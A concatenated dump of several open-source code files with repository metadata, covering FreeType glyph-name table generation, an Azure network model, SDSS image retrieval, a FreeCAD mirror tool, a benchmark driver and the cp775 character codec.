st = StringTable( base_list, "ft_standard_glyph_names" )
st.dump( file )
st.dump_sublist( file, "ft_mac_names",
"FT_NUM_MAC_NAMES", mac_standard_names )
st.dump_sublist( file, "ft_sid_names",
"FT_NUM_SID_NAMES", sid_standard_names )
dump_encoding( file, "t1_standard_encoding", t1_standard_encoding )
dump_encoding( file, "t1_expert_encoding", t1_expert_encoding )
# dump the AGL in its compressed form
#
agl_glyphs, agl_values = adobe_glyph_values()
  trie = StringNode( "", 0 )
  for g in range( len( agl_glyphs ) ):
    trie.add( agl_glyphs[g], int( agl_values[g], 16 ) )
  trie = trie.optimize()
  trie_len = trie.locate( 0 )    # assigns every node its absolute offset
  trie_array = trie.store( "" )
write( """\
/*
* This table is a compressed version of the Adobe Glyph List (AGL),
* optimized for efficient searching. It has been generated by the
* `glnames.py' python script located in the `src/tools' directory.
*
* The lookup function to get the Unicode value for a given string
* is defined below the table.
*/
""" )
  dump_array( trie_array, write, "ft_adobe_glyph_list" )
# write the lookup routine now
#
write( """\
/*
* This function searches the compressed table efficiently.
*/
static unsigned long
ft_get_adobe_glyph_index( const char* name,
const char* limit )
{
int c = 0;
int count, min, max;
const unsigned char* p = ft_adobe_glyph_list;
if ( name == 0 || name >= limit )
goto NotFound;
c = *name++;
count = p[1];
p += 2;
min = 0;
max = count;
while ( min < max )
{
int mid = ( min + max ) >> 1;
const unsigned char* q = p + mid * 2;
int c2;
q = ft_adobe_glyph_list + ( ( (int)q[0] << 8 ) | q[1] );
c2 = q[0] & 127;
if ( c2 == c )
{
p = q;
goto Found;
}
if ( c2 < c )
min = mid + 1;
else
max = mid;
}
goto NotFound;
Found:
for (;;)
{
/* assert (*p & 127) == c */
if ( name >= limit )
{
if ( (p[0] & 128) == 0 &&
(p[1] & 128) != 0 )
return (unsigned long)( ( (int)p[2] << 8 ) | p[3] );
goto NotFound;
}
c = *name++;
if ( p[0] & 128 )
{
p++;
if ( c != (p[0] & 127) )
goto NotFound;
continue;
}
p++;
count = p[0] & 127;
if ( p[0] & 128 )
p += 2;
p++;
for ( ; count > 0; count--, p += 2 )
{
int offset = ( (int)p[0] << 8 ) | p[1];
const unsigned char* q = ft_adobe_glyph_list + offset;
if ( c == ( q[0] & 127 ) )
{
p = q;
goto NextIter;
}
}
goto NotFound;
NextIter:
;
}
NotFound:
return 0;
}
""" )
if 0: # generate unit test, or don't
#
# now write the unit test to check that everything works OK
#
write( "#ifdef TEST\n\n" )
write( "static const char* const the_names[] = {\n" )
for name in agl_glyphs:
write( ' "' + name + '",\n' )
write( " 0\n};\n" )
write( "static const unsigned long the_values[] = {\n" )
for val in agl_values:
write( ' 0x' + val + ',\n' )
write( " 0\n};\n" )
write( """
#include <stdlib.h>
#include <stdio.h>
int
main( void )
{
int result = 0;
const char* const* names = the_names;
const unsigned long* values = the_values;
for ( ; *names; names++, values++ )
{
const char* name = *names;
unsigned long reference = *values;
unsigned long value;
value = ft_get_adobe_glyph_index( name, name + strlen( name ) );
if ( value != reference )
{
result = 1;
fprintf( stderr, "name '%s' => %04x instead of %04x\\n",
name, value, reference );
}
}
return result;
}
""" )
write( "#endif /* TEST */\n" )
write("\n/* END */\n")
# Now run the main routine
#
main()
# END
| lgpl-2.1 | 8,445,638,624,428,069,000 | 18.558311 | 92 | 0.793015 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_10_01/models/connectivity_hop.py | 1 | 2114 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConnectivityHop(Model):
"""Information about a hop between the source and the destination.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar type: The type of the hop.
:vartype type: str
:ivar id: The ID of the hop.
:vartype id: str
:ivar address: The IP address of the hop.
:vartype address: str
:ivar resource_id: The ID of the resource corresponding to this hop.
:vartype resource_id: str
:ivar next_hop_ids: List of next hop identifiers.
:vartype next_hop_ids: list[str]
:ivar issues: List of issues.
:vartype issues:
list[~azure.mgmt.network.v2017_10_01.models.ConnectivityIssue]
"""
_validation = {
'type': {'readonly': True},
'id': {'readonly': True},
'address': {'readonly': True},
'resource_id': {'readonly': True},
'next_hop_ids': {'readonly': True},
'issues': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'address': {'key': 'address', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'next_hop_ids': {'key': 'nextHopIds', 'type': '[str]'},
'issues': {'key': 'issues', 'type': '[ConnectivityIssue]'},
}
def __init__(self, **kwargs):
super(ConnectivityHop, self).__init__(**kwargs)
self.type = None
self.id = None
self.address = None
self.resource_id = None
self.next_hop_ids = None
self.issues = None
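# Note (illustrative sketch): instances are populated by the service, e.g.
# inside the `hops' list of a ConnectivityInformation result returned by a
# Network Watcher connectivity check; all attributes read back as None on a
# freshly constructed object:
#
#   hop = ConnectivityHop()
#   assert hop.address is None   # server-populated, read-only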
| mit | 5,632,207,756,155,749,000 | 33.655738 | 76 | 0.563387 | false |
nhmc/xastropy | xastropy/obs/x_getsdssimg.py | 1 | 4285 | #;+
#; NAME:
#; x_getsdssimg
#; Version 1.1
#;
#; PURPOSE:
#; Returns an Image by querying the SDSS website
#; Will use DSS2-red as a backup
#;
#; CALLING SEQUENCE:
#;
#; INPUTS:
#;
#; RETURNS:
#;
#; OUTPUTS:
#;
#; OPTIONAL KEYWORDS:
#;
#; OPTIONAL OUTPUTS:
#;
#; COMMENTS:
#;
#; EXAMPLES:
#;
#; PROCEDURES/FUNCTIONS CALLED:
#;
#; REVISION HISTORY:
#; 23-Apr-2014 Written by JXP
#;-
#;------------------------------------------------------------------------------
# Import libraries
from __future__ import print_function, absolute_import, division#, unicode_literals
import requests
from cStringIO import StringIO
from astroquery.sdss import SDSS
from astropy.coordinates import SkyCoord
from astropy import units as u
from xastropy.xutils import xdebug as xdb
# Generate the SDSS URL (default is 202" on a side)
def sdsshttp(ra, dec, imsize, scale=0.39612, grid=None, label=None, invert=None):#, xs, ys):
# Pixels
npix = round(imsize*60./scale)
xs = npix
ys = npix
#from StringIO import StringIO
# Generate the http call
name1='http://skyservice.pha.jhu.edu/DR12/ImgCutout/'
name='getjpeg.aspx?ra='
name+=str(ra) #setting the ra
name+='&dec='
name+=str(dec) #setting the declination
name+='&scale='
name+=str(scale) #setting the scale
name+='&width='
name+=str(int(xs)) #setting the width
name+='&height='
name+=str(int(ys)) #setting the height
#------ Options
options = ''
    if grid is not None:
        options += 'G'
    if label is not None:
        options += 'L'
    if invert is not None:
        options += 'I'
if len(options) > 0:
name+='&opt='+options
name+='&query='
url = name1+name
return url
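# For example (coordinates purely illustrative), sdsshttp(10.0, 20.0, 1)
# returns a 151x151 pixel cutout (1 arcmin at 0.39612 arcsec/pix):
#   http://skyservice.pha.jhu.edu/DR12/ImgCutout/getjpeg.aspx?ra=10.0&dec=20.0&scale=0.39612&width=151&height=151&query=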
# Generate the DSS URL (default is poss2ukstu_red plates)
def dsshttp(ra, dec, imsize):
#https://archive.stsci.edu/cgi-bin/dss_search?v=poss2ukstu_red&r=00:42:44.35&d=+41:16:08.6&e=J2000&h=15.0&w=15.0&f=gif&c=none&fov=NONE&v3=
Equinox = 'J2000'
dss = 'poss2ukstu_red'
url = "http://archive.stsci.edu/cgi-bin/dss_search?"
url += "v="+dss+'&r='+str(ra)+'&d='+str(dec)
url += "&e="+Equinox
url += '&h='+str(imsize)+"&w="+str(imsize)
url += "&f=gif"
url += "&c=none"
url += "&fov=NONE"
url += "&v3="
return url
# ##########################################
def getimg(ira, idec, imsize, BW=False, DSS=None):
    ''' Grab an SDSS image from the given URL, if possible.
    Parameters
    ----------
    ira : float or Quantity
        RA in decimal degrees
    idec : float or Quantity
        DEC in decimal degrees
    '''
import PIL
from PIL import Image
# Strip units as need be
try:
ra = ira.value
except AttributeError:
ra = ira
dec = idec
else:
dec = idec.value
# Get URL
if DSS == None: # Default
url = sdsshttp(ra,dec,imsize)
else:
url = dsshttp(ra,dec,imsize) # DSS
# Request
rtv = requests.get(url)
# Query for photometry
coord = SkyCoord(ra=ra*u.degree, dec=dec*u.degree)
phot = SDSS.query_region(coord, radius=0.02*u.deg)
if phot is None:
print('getimg: Pulling from DSS instead of SDSS')
BW = 1
url = dsshttp(ra,dec,imsize) # DSS
rtv = requests.get(url)
img = Image.open(StringIO(rtv.content))
# B&W ?
if BW:
import PIL.ImageOps
img2 = img.convert("L")
img2 = PIL.ImageOps.invert(img2)
img = img2
return img, BW
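# For example (coordinates purely illustrative), to fetch and display a
# 2 arcmin cutout, falling back to DSS automatically where SDSS has no
# photometric coverage:
#   img, bw = getimg(10.0, 20.0, 2)
#   img.show()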
# ##########################################
def get_spec_img(ra, dec):
    from PIL import Image
# Coord
if hasattr(ra,'unit'):
coord = SkyCoord(ra=ra, dec=dec)
else:
coord = SkyCoord(ra=ra*u.degree, dec=dec*u.degree)
# Query database
radius = 1*u.arcsec
spec_catalog = SDSS.query_region(coord,spectro=True, radius=radius.to('degree'))
# Request
url = 'http://skyserver.sdss.org/dr12/en/get/SpecById.ashx?id='+str(int(spec_catalog['specobjid']))
rtv = requests.get(url)
img = Image.open(StringIO(rtv.content))
return img
# #############
# Call with RA/DEC (decimal degrees)
def radecd(ra, dec):
import x_getsdssimg as x_gsdss
img = x_gsdss.getimg(ra,dec)
return img
| bsd-3-clause | -1,572,045,953,393,898,200 | 22.288043 | 142 | 0.574329 | false |
sanguinariojoe/FreeCAD | src/Mod/Draft/draftfunctions/mirror.py | 9 | 4578 | # ***************************************************************************
# * Copyright (c) 2009, 2010 Yorik van Havre <yorik@uncreated.net> *
# * Copyright (c) 2009, 2010 Ken Cline <cline@frii.com> *
# * Copyright (c) 2020 Carlo Pavan <carlopav@gmail.com> *
# * Copyright (c) 2020 Eliud Cabrera Castillo <e.cabrera-castillo@tum.de> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides functions to produce a mirrored object.
It just creates a `Part::Mirroring` object, and sets the appropriate
`Source` and `Normal` properties.
"""
## @package mirror
# \ingroup draftfunctions
# \brief Provides functions to produce a mirrored object.
## \addtogroup draftfuctions
# @{
import FreeCAD as App
import draftutils.utils as utils
import draftutils.gui_utils as gui_utils
from draftutils.messages import _err
from draftutils.translate import translate
if App.GuiUp:
import FreeCADGui as Gui
def mirror(objlist, p1, p2):
"""Create a mirror object from the provided list and line.
It creates a `Part::Mirroring` object from the given `objlist` using
a plane that is defined by the two given points `p1` and `p2`,
and either
- the Draft working plane normal, or
- the negative normal provided by the camera direction
if the working plane normal does not exist and the graphical interface
is available.
If neither of these two is available, it uses as normal the +Z vector.
Parameters
----------
objlist: single object or a list of objects
A single object or a list of objects.
p1: Base::Vector3
Point 1 of the mirror plane. It is also used as the `Placement.Base`
of the resulting object.
p2: Base::Vector3
Point 1 of the mirror plane.
Returns
-------
None
If the operation fails.
list
List of `Part::Mirroring` objects, or a single one
depending on the input `objlist`.
To Do
-----
Implement a mirror tool specific to the workbench that does not
just use `Part::Mirroring`. It should create a derived object,
that is, it should work similar to `Draft.offset`.
"""
utils.print_header('mirror', "Create mirror")
if not objlist:
_err(translate("draft","No object given"))
return
if p1 == p2:
_err(translate("draft","The two points are coincident"))
return
if not isinstance(objlist, list):
objlist = [objlist]
if hasattr(App, "DraftWorkingPlane"):
norm = App.DraftWorkingPlane.getNormal()
elif App.GuiUp:
norm = Gui.ActiveDocument.ActiveView.getViewDirection().negative()
else:
norm = App.Vector(0, 0, 1)
pnorm = p2.sub(p1).cross(norm).normalize()
result = []
for obj in objlist:
mir = App.ActiveDocument.addObject("Part::Mirroring", "mirror")
mir.Label = obj.Label + " (" + translate("draft","mirrored") + ") "
mir.Source = obj
mir.Base = p1
mir.Normal = pnorm
gui_utils.format_object(mir, obj)
result.append(mir)
if len(result) == 1:
result = result[0]
gui_utils.select(result)
return result
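# A minimal usage sketch (names assumed; run inside an open FreeCAD document):
#
#   import FreeCAD as App
#   import Draft
#   line = Draft.make_line(App.Vector(0, 0, 0), App.Vector(10, 0, 0))
#   mir = mirror(line, App.Vector(0, -5, 0), App.Vector(0, 5, 0))
#   App.ActiveDocument.recompute()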
## @}
| lgpl-2.1 | 2,656,797,352,616,214,500 | 35.333333 | 77 | 0.562473 | false |
GoogleCloudPlatform/PerfKitBenchmarker | perfkitbenchmarker/data/edw/multistream_multiprofile_driver.py | 1 | 2591 | """Driver for running multiple profiles concurrently against a cluster.
The list of profiles are passed via flag each of which are defined in the
profile_details module.
"""
__author__ = 'p3rf@google.com'
import json
import logging
from multiprocessing import Process
from multiprocessing import Queue
import time
from absl import app
from absl import flags
import unistream_profile_driver
flags.DEFINE_list('profile_list', None, 'List of profiles. Each will be run on '
'its own process to simulate '
'concurrency.')
flags.mark_flags_as_required(['profile_list'])
FLAGS = flags.FLAGS
def process_profile(profile, response_q):
"""Method to execute a profile (list of sql scripts) on a cluster.
Args:
profile: The profile to run.
response_q: Communication channel between processes.
"""
profile_output = unistream_profile_driver.execute_profile(profile)
response_q.put([profile, profile_output])
def manage_streams():
"""Method to launch concurrent execution of multiple profiles.
Returns:
    A JSON string encoding a dictionary containing
1. wall_time: Total time taken for all the profiles to complete execution.
2. profile details:
2.1. profile_execution_time: Time taken for all scripts in the profile to
complete execution.
2.2. Individual script metrics: script name and its execution time (-1 if
the script fails)
"""
profile_handling_process_list = []
profile_performance = Queue()
start_time = time.time()
for profile in FLAGS.profile_list:
profile_handling_process = Process(target=process_profile,
args=(profile, profile_performance,))
profile_handling_process.start()
profile_handling_process_list.append(profile_handling_process)
for profile_handling_process in profile_handling_process_list:
profile_handling_process.join()
# All processes have joined, implying all profiles have been completed
execution_time = round((time.time() - start_time), 2)
num_profiles = len(FLAGS.profile_list)
overall_performance = {}
while num_profiles:
temp_performance_response = profile_performance.get()
profile = temp_performance_response[0]
overall_performance[profile] = json.loads(temp_performance_response[1])
num_profiles -= 1
overall_performance['wall_time'] = execution_time
return json.dumps(overall_performance)
def main(argv):
del argv
print(manage_streams())
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
app.run(main)
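# Example invocation (profile names are illustrative; each must be defined in
# the profile_details module):
#
#   python multistream_multiprofile_driver.py \
#       --profile_list=profile_a,profile_b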
| apache-2.0 | -1,865,130,433,890,418,700 | 27.788889 | 80 | 0.699344 | false |
RiccardoPecora/MP | Lib/encodings/cp775.py | 93 | 35429 | """ Python Character Mapping Codec cp775 generated from 'VENDORS/MICSFT/PC/CP775.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp775',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
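### Usage sketch (Python 2 syntax, matching this module; assumes the codec
### has been registered, e.g. by living in the standard `encodings' package):
###
### >>> u'\u0106'.encode('cp775')   # LATIN CAPITAL LETTER C WITH ACUTE
### '\x80'
### >>> '\x80'.decode('cp775')
### u'\u0106'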
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0106, # LATIN CAPITAL LETTER C WITH ACUTE
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x0101, # LATIN SMALL LETTER A WITH MACRON
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x0123, # LATIN SMALL LETTER G WITH CEDILLA
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x0107, # LATIN SMALL LETTER C WITH ACUTE
0x0088: 0x0142, # LATIN SMALL LETTER L WITH STROKE
0x0089: 0x0113, # LATIN SMALL LETTER E WITH MACRON
0x008a: 0x0156, # LATIN CAPITAL LETTER R WITH CEDILLA
0x008b: 0x0157, # LATIN SMALL LETTER R WITH CEDILLA
0x008c: 0x012b, # LATIN SMALL LETTER I WITH MACRON
0x008d: 0x0179, # LATIN CAPITAL LETTER Z WITH ACUTE
0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x014d, # LATIN SMALL LETTER O WITH MACRON
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x0122, # LATIN CAPITAL LETTER G WITH CEDILLA
0x0096: 0x00a2, # CENT SIGN
0x0097: 0x015a, # LATIN CAPITAL LETTER S WITH ACUTE
0x0098: 0x015b, # LATIN SMALL LETTER S WITH ACUTE
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00f8, # LATIN SMALL LETTER O WITH STROKE
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d8, # LATIN CAPITAL LETTER O WITH STROKE
0x009e: 0x00d7, # MULTIPLICATION SIGN
0x009f: 0x00a4, # CURRENCY SIGN
0x00a0: 0x0100, # LATIN CAPITAL LETTER A WITH MACRON
0x00a1: 0x012a, # LATIN CAPITAL LETTER I WITH MACRON
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x017b, # LATIN CAPITAL LETTER Z WITH DOT ABOVE
0x00a4: 0x017c, # LATIN SMALL LETTER Z WITH DOT ABOVE
0x00a5: 0x017a, # LATIN SMALL LETTER Z WITH ACUTE
0x00a6: 0x201d, # RIGHT DOUBLE QUOTATION MARK
0x00a7: 0x00a6, # BROKEN BAR
0x00a8: 0x00a9, # COPYRIGHT SIGN
0x00a9: 0x00ae, # REGISTERED SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x0141, # LATIN CAPITAL LETTER L WITH STROKE
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x0104, # LATIN CAPITAL LETTER A WITH OGONEK
0x00b6: 0x010c, # LATIN CAPITAL LETTER C WITH CARON
0x00b7: 0x0118, # LATIN CAPITAL LETTER E WITH OGONEK
0x00b8: 0x0116, # LATIN CAPITAL LETTER E WITH DOT ABOVE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x012e, # LATIN CAPITAL LETTER I WITH OGONEK
0x00be: 0x0160, # LATIN CAPITAL LETTER S WITH CARON
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x0172, # LATIN CAPITAL LETTER U WITH OGONEK
0x00c7: 0x016a, # LATIN CAPITAL LETTER U WITH MACRON
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x017d, # LATIN CAPITAL LETTER Z WITH CARON
0x00d0: 0x0105, # LATIN SMALL LETTER A WITH OGONEK
0x00d1: 0x010d, # LATIN SMALL LETTER C WITH CARON
0x00d2: 0x0119, # LATIN SMALL LETTER E WITH OGONEK
0x00d3: 0x0117, # LATIN SMALL LETTER E WITH DOT ABOVE
0x00d4: 0x012f, # LATIN SMALL LETTER I WITH OGONEK
0x00d5: 0x0161, # LATIN SMALL LETTER S WITH CARON
0x00d6: 0x0173, # LATIN SMALL LETTER U WITH OGONEK
0x00d7: 0x016b, # LATIN SMALL LETTER U WITH MACRON
0x00d8: 0x017e, # LATIN SMALL LETTER Z WITH CARON
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S (GERMAN)
0x00e2: 0x014c, # LATIN CAPITAL LETTER O WITH MACRON
0x00e3: 0x0143, # LATIN CAPITAL LETTER N WITH ACUTE
0x00e4: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x00e5: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x0144, # LATIN SMALL LETTER N WITH ACUTE
0x00e8: 0x0136, # LATIN CAPITAL LETTER K WITH CEDILLA
0x00e9: 0x0137, # LATIN SMALL LETTER K WITH CEDILLA
0x00ea: 0x013b, # LATIN CAPITAL LETTER L WITH CEDILLA
0x00eb: 0x013c, # LATIN SMALL LETTER L WITH CEDILLA
0x00ec: 0x0146, # LATIN SMALL LETTER N WITH CEDILLA
0x00ed: 0x0112, # LATIN CAPITAL LETTER E WITH MACRON
0x00ee: 0x0145, # LATIN CAPITAL LETTER N WITH CEDILLA
0x00ef: 0x2019, # RIGHT SINGLE QUOTATION MARK
0x00f0: 0x00ad, # SOFT HYPHEN
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x201c, # LEFT DOUBLE QUOTATION MARK
0x00f3: 0x00be, # VULGAR FRACTION THREE QUARTERS
0x00f4: 0x00b6, # PILCROW SIGN
0x00f5: 0x00a7, # SECTION SIGN
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x00b9, # SUPERSCRIPT ONE
0x00fc: 0x00b3, # SUPERSCRIPT THREE
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})

### Decoding Table

decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
